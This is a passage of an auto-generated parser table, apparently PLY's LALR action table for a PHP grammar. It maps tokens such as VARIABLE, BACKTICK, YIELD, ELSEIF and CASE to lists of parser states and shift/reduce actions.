,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,95,-3,-2,-4,-5,-6,95,-50,-443,95,95,95,95,95,-47,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-443,95,95,-23,95,-48,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-38,-40,-42,-443,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-8,-443,95,-30,-22,-24,-25,-26,95,-11,95,-12,95,95,-39,-41,-43,-44,95,-45,95,-46,95,95,-56,95,95,95,95,95,95,95,95,-7,95,-9,95,95,-28,95,95,95,95,95,95,95,95,95,95,95,-443,95,95,95,95,95,95,95,95,-10,-29,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,-443,-443,95,95,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,95,-111,95,95,95,-27,95,95,-443,-62,95,95,95,-51,-55,95,95,95,95,-110,95,95,-31,-64,95,-34,95,-85,95,-443,-443,-443,95,-109,95,95,95,-65,-71,95,-36,-83,-443,-443,-92,-93,-86,-87,95,-61,95,95,95,95,-443,-35,-76,-443,95,-443,95,-88,-54,-108,95,95,95,-32,95,95,95,-63,-84,-443,-443,-77,95,-443,95,-52,95,]),'FUNC_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,
360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,96,-3,-2,-4,-5,-6,96,-50,-443,96,96,96,96,96,-47,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-443,96,96,-23,96,-48,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-38,-40,-42,-443,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-8,-443,96,-30,-22,-24,-25,-26,96,-11,96,-12,96,96,-39,-41,-43,-44,96,-45,96,-46,96,96,-56,96,96,96,96,96,96,96,96,-7,96,-9,96,96,-28,96,96,96,96,96,96,96,96,96,96,96,-443,96,96,96,96,96,96,96,96,-10,-29,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,-443,-443,96,96,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,96,-111,96,96,96,-27,96,96,-443,-62,96,96,96,-51,-55,96,96,96,96,-110,96,96,-31,-64,96,-34,96,-85,96,-443,-443,-443,96,-109,96,96,96,-65,-71,96,-36,-83,-443,-443,-92,-93,-86,-87,96,-61,96,96,96,96,-443,-35,-76,-443,96,-443,96,-88,-54,-108,96,96,96,-32,96,96,96,-63,-84,-443,-443,-77,96,-443,96,-52,96,]),'NS_C':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304
,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,97,-3,-2,-4,-5,-6,97,-50,-443,97,97,97,97,97,-47,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-443,97,97,-23,97,-48,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-38,-40,-42,-443,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-8,-443,97,-30,-22,-24,-25,-26,97,-11,97,-12,97,97,-39,-41,-43,-44,97,-45,97,-46,97,97,-56,97,97,97,97,97,97,97,97,-7,97,-9,97,97,-28,97,97,97,97,97,97,97,97,97,97,97,-443,97,97,97,97,97,97,97,97,-10,-29,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,-443,-443,97,97,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,97,-111,97,97,97,-27,97,97,-443,-62,97,97,97,-51,-55,97,97,97,97,-110,97,97,-31,-64,97,-34,97,-85,97,-443,-443,-443,97,-109,97,97,97,-65,-71,97,-36,-83,-443,-443,-92,-93,-86,-87,97,-61,97,97,97,97,-443,-35,-76,-443,97,-443,97,-88,-54,-108,97,97,97,-32,97,97,97,-63,-84,-443,-443,-77,97,-443,97,-52,97,]),'START_HEREDOC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,2
75,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,98,-3,-2,-4,-5,-6,98,-50,-443,98,98,98,98,98,-47,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,-443,98,98,-23,98,-48,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,-38,-40,-42,-443,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,-8,-443,98,-30,-22,-24,-25,-26,98,-11,471,-12,98,98,-39,-41,-43,-44,98,-45,471,-46,98,98,-56,98,98,98,98,98,98,98,98,-7,98,-9,98,98,-28,471,471,471,471,98,98,98,98,98,98,98,-443,98,471,98,98,98,98,98,98,-10,-29,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,-443,-443,98,98,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,471,-111,98,98,98,-27,471,471,-443,-62,98,98,98,-51,-55,98,471,471,471,-110,98,98,-31,-64,98,-34,98,-85,98,-443,-443,-443,471,-109,471,471,98,-65,-71,98,-36,-83,-443,-443,-92,-93,-86,-87,98,-61,98,98,471,98,-443,-35,-76,-443,98,-443,98,-88,-54,-108,471,471,98,-32,98,98,98,-63,-84,-443,-443,-77,98,-443,98,-52,98,]),'START_NOWDOC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,
168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,99,-3,-2,-4,-5,-6,99,-50,-443,99,99,99,99,99,-47,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-443,99,99,-23,99,-48,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-38,-40,-42,-443,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-8,-443,99,-30,-22,-24,-25,-26,99,-11,99,-12,99,99,-39,-41,-43,-44,99,-45,99,-46,99,99,-56,99,99,99,99,99,99,99,99,-7,99,-9,99,99,-28,99,99,99,99,99,99,99,99,99,99,99,-443,99,99,99,99,99,99,99,99,-10,-29,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-443,-443,99,99,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,99,-111,99,99,99,-27,99,99,-443,-62,99,99,99,-51,-55,99,99,99,99,-110,99,99,-31,-64,99,-34,99,-85,99,-443,-443,-443,99,-109,99,99,99,-65,-71,99,-36,-83,-443,-443,-92,-93,-86,-87,99,-61,99,99,99,99,-443,-35,-76,-443,99,-443,99,-88,-54,-108,99,99,99,-32,99,99,99,-63,-84,-443,-443,-77,99,-443,99,-52,99,]),'BACKTICK':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,103,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,1
51,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,258,265,266,267,268,270,275,276,277,284,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,420,421,422,423,424,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,491,499,500,501,528,532,533,535,537,540,545,556,557,559,560,566,570,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,657,679,682,691,692,693,694,703,740,741,742,746,748,751,752,759,762,763,776,796,799,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,901,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,103,-3,-2,-4,-5,-6,103,-50,-443,103,103,103,103,103,-47,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,-443,-443,103,103,-23,103,-48,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,-38,-40,-42,103,103,-443,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,-432,103,437,103,103,103,-8,-443,103,103,-30,-22,-24,-25,-26,103,-11,-12,103,103,-39,-41,-43,-44,103,-45,-46,103,103,-56,103,103,103,103,-431,-433,-434,103,103,103,103,103,-7,103,-9,103,103,-28,103,103,103,103,103,103,103,103,103,-443,103,103,103,103,103,103,103,103,103,103,103,103,-10,-29,-443,-443,103,103,-33,-70,-443,103,-37,-49,-443,-53,-57,-60,-443,-111,103,103,-436,-437,103,-439,-27,-443,-62,103,103,103,103,103,-51,-55,103,-110,103,-435,103,103,-31,-64,103,-34,103,-85,103,-443,-443,-443,-109,103,-65,-71,103,-36,-83,-443,-443,-92,-93,-86,-87,103,-61,103,103,-438,103,-443,-35,-76,-443,103,-443,103,-88,-54,-108,103,-32,103,103,103,-63,-84,-443,-443,-77,103,-443,103,-52,103,]),'DOLLAR':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,26,28,29,32,40,41,45,46,47,48,49,50,51,52,53,
54,55,56,57,58,59,63,64,65,66,68,69,105,114,119,120,121,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,349,351,352,354,355,356,360,361,375,389,391,394,395,404,407,410,411,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,790,796,797,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,105,-3,-2,-4,-5,-6,105,-50,-443,105,105,105,105,173,105,-47,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-443,105,105,-23,105,-48,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-38,-40,-42,105,105,-443,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-8,-443,105,105,-30,-22,-24,-25,-26,105,-11,473,-12,105,105,-39,-41,-43,-44,173,105,-45,473,-46,105,105,-56,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-7,105,-9,105,105,-28,473,473,473,473,105,105,105,105,105,105,105,105,105,-443,105,473,105,105,105,105,105,105,105,105,105,105,105,-10,-29,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,-443,-443,1
05,105,-33,-70,-443,105,-37,-49,-443,-53,-57,-60,-443,473,-111,105,105,105,-27,473,473,-443,-62,105,105,105,105,105,-51,-55,105,473,473,473,-110,105,105,105,105,105,-31,-64,105,-34,105,-85,105,-443,-443,-443,473,-109,473,473,105,-65,-71,105,-36,-83,-443,-443,-92,-93,-86,-87,105,-61,105,105,473,105,-443,-35,-76,-443,105,-443,105,-88,-54,-108,473,473,105,-32,105,105,105,-63,-84,-443,-443,-77,105,-443,105,-52,105,]),'VARIABLE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,26,27,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,76,98,103,105,111,114,116,117,119,120,121,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,186,191,192,193,194,195,196,197,198,199,200,201,202,205,209,217,218,222,244,245,246,251,256,257,258,260,261,262,265,266,267,268,270,275,276,277,279,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,349,351,352,353,354,355,356,360,361,365,366,375,389,391,392,394,395,404,407,410,411,420,421,422,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,504,509,510,516,528,529,532,533,535,537,540,545,550,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,648,652,657,660,662,664,665,666,667,668,669,670,671,672,679,682,691,692,693,694,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,775,776,779,788,790,796,797,799,803,806,811,813,814,820,822,825,826,832,835,836,837,839,841,850,851,860,861,862,867,868,869,870,871,874,875,876,877,878,880,881,882,883,884,886,894,901,907,908,909,910,911,912,913,914,915,917,918,921,924,927,928,934,935,937,938,940,942,944,951,954,955,962,963,964,967,972,973,975,],[-443,107,-3,-2,-4,-5,-6,107,-50,-443,107,107,107,107,172,176,107,-47,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,10
7,107,107,107,107,107,107,107,107,-443,-443,-443,107,-190,-443,-429,-430,107,107,-23,107,-48,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,-38,-40,-42,107,107,-443,-443,107,107,107,107,107,107,107,107,107,107,107,107,107,-187,107,107,107,107,107,107,107,107,422,-432,107,107,422,107,422,107,107,107,-8,-443,107,-428,107,-30,-22,-24,-25,-26,107,-11,107,-12,107,107,-39,-41,-43,-44,172,107,-45,176,107,-46,107,107,-56,508,422,107,107,107,-188,107,107,107,107,107,107,-431,-433,-434,107,107,107,107,107,-7,107,-9,107,107,-28,107,107,107,107,107,107,107,107,107,107,107,107,107,-443,107,107,508,647,649,-117,107,-189,107,107,107,107,107,107,687,107,107,107,107,-10,-29,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,-443,-443,107,107,-33,-70,-443,107,-37,-49,-443,-53,-57,-60,-443,508,107,772,-118,-111,786,-152,-153,-159,-163,-164,-165,-166,-160,-161,-162,107,107,-436,-437,107,-439,-27,107,107,-443,-62,107,107,107,107,107,-51,-55,107,107,107,107,-119,-110,786,-158,107,107,107,-435,107,107,-31,-64,107,-34,107,-85,107,-443,-443,-443,887,107,-109,896,107,107,107,-65,-71,107,-36,-83,-443,-443,-92,-93,-86,-87,916,107,-61,107,107,922,107,-438,107,-443,-35,-76,-443,107,-443,107,-88,-54,-108,943,107,508,107,107,-32,107,107,107,956,508,-63,-84,-443,-443,-77,107,-443,107,-52,107,]),'$end':([0,1,2,3,4,5,6,7,10,29,130,164,166,168,275,285,292,295,345,346,347,348,352,355,361,441,443,500,566,613,620,621,630,634,636,637,638,639,657,740,741,759,762,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,963,973,],[-443,0,-1,-3,-2,-4,-5,-6,-50,-47,-48,-38,-40,-42,-8,-30,-11,-12,-39,-41,-43,-44,-45,-46,-56,-7,-9,-443,-10,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-443,-62,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-77,-52,]),'RBRACE':([3,4,5,6,7,10,12,13,29,35,39,43,44,67,73,74,75,77,78,7
9,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,114,116,117,120,121,130,132,164,166,168,180,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,275,276,277,278,279,285,286,287,288,289,292,295,300,301,302,303,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,345,346,347,348,352,355,360,361,373,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,439,440,441,442,443,445,449,478,480,481,482,483,484,486,494,500,511,519,522,523,524,525,527,529,530,531,536,544,546,547,548,549,552,553,554,558,561,562,563,564,565,566,570,613,618,619,620,621,630,631,634,636,637,638,639,650,654,655,657,658,673,674,675,676,677,685,686,695,698,701,702,703,740,741,743,745,754,755,756,759,762,774,776,777,789,791,792,794,798,801,802,804,805,811,813,817,818,820,825,828,832,835,836,841,844,849,852,853,854,856,857,862,867,869,870,874,875,876,877,878,881,882,883,884,890,892,893,898,899,900,902,903,909,910,913,914,915,917,918,919,925,930,931,935,940,946,951,954,955,963,964,966,967,968,969,971,973,974,975,976,977,],[-3,-2,-4,-5,-6,-50,-362,-443,-47,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-443,-429,-430,285,-23,-48,-443,-38,-40,-42,-443,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-8,-443,443,-364,-428,-30,-22,-24,-25,-26,-11,-12,-443,-443,-244,-248,-250,-241,484,-242,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,-39,-41,-43,-44,-45,-46,500,-56,-443,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-44
3,-352,-365,-385,-229,-366,-230,-357,-358,-219,564,565,-7,566,-9,-209,-28,-184,-221,-243,-245,618,-238,-320,633,-443,-353,-443,657,-130,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,692,-361,694,698,701,-218,-235,-236,-240,-10,-29,-443,-249,-319,-33,-70,-37,-443,-49,-443,-53,-57,-60,-443,776,-136,-111,-129,-196,789,-191,-194,792,-205,-223,-210,-231,-232,-211,-27,-443,-62,-220,818,825,-443,-89,-51,-55,841,-110,-135,-231,-193,-232,-199,-222,-212,-213,-214,-215,-31,-64,-246,-247,-34,-85,877,-443,-443,-443,-109,-139,-132,-443,-134,-195,-443,901,-65,-71,-36,-83,-443,-92,-93,-86,-87,917,-61,918,919,-138,-443,-141,930,-123,-224,-216,-217,-35,-76,-443,-91,-88,-54,-108,-271,946,-133,-122,-32,-90,-140,-63,-84,-443,-77,973,-131,-443,-157,-126,-128,-52,-137,977,-127,-156,]),'YIELD':([10,13,29,120,121,130,164,166,168,180,285,286,287,288,289,345,346,347,348,352,355,360,361,449,500,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-50,-443,-47,291,-23,-48,-38,-40,-42,-443,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,291,-56,-28,-443,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,291,291,-51,-55,291,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,291,-61,291,291,-443,-35,-76,-443,291,-443,291,-88,-54,-108,-32,291,291,291,-63,-84,-443,-443,-77,291,-443,291,-52,291,]),'ELSEIF':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,614,620,621,630,634,636,637,638,639,657,703,740,741,742,759,762,776,811,813,815,816,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,962,963,972,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,812,-62
,-443,-51,-55,-110,-31,-64,864,-66,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-443,-77,-67,-52,]),'ELSE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,614,620,621,630,634,636,637,638,639,657,703,740,741,742,759,762,776,811,813,815,816,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,962,963,972,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,814,-62,-443,-51,-55,-110,-31,-64,866,-66,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-443,-77,-67,-52,]),'ENDIF':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,614,620,621,630,634,636,637,638,639,657,703,740,741,742,759,762,776,811,813,815,816,820,825,841,862,863,865,867,869,870,877,878,882,908,909,910,915,917,918,935,937,951,954,962,963,972,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,-443,-51,-55,-110,-31,-64,-443,-66,-34,-85,-109,-65,906,-68,-71,-36,-83,-86,-87,-61,-443,-35,-76,-88,-54,-108,-32,-69,-63,-84,-443,-77,-67,-52,]),'ENDWHILE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,622,630,634,636,637,638,639,657,703,740,741,746,759,762,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,819,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-77,-52,]),'ENDDECLARE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,634,636,637,638,639,640,657,703,740,741,759,762,763,776,811,813,820,825,841,862,867,869,870,87
7,878,882,909,910,915,917,918,935,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,-51,-55,833,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-77,-52,]),'ENDFOREACH':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,634,636,637,638,639,657,703,740,741,759,762,776,811,813,820,825,841,862,867,869,870,871,877,878,882,909,910,912,915,917,918,935,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-443,-86,-87,-61,-35,-76,939,-88,-54,-108,-32,-63,-84,-77,-52,]),'CASE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,631,632,634,636,637,638,639,657,703,740,741,754,755,756,757,758,759,762,776,811,813,820,825,828,830,841,862,867,869,870,874,875,876,877,878,882,909,910,913,914,915,917,918,935,940,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-443,-443,-49,-443,-53,-57,-60,-111,-27,-443,-62,826,-443,-89,826,-443,-51,-55,-110,-31,-64,-34,-85,826,826,-109,-65,-71,-36,-83,-443,-92,-93,-86,-87,-61,-35,-76,-443,-91,-88,-54,-108,-32,-90,-63,-84,-77,-52,]),'DEFAULT':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,631,632,634,636,637,638,639,657,703,740,741,754,755,756,757,758,759,762,776,811,813,820,825,828,830,841,862,867,869,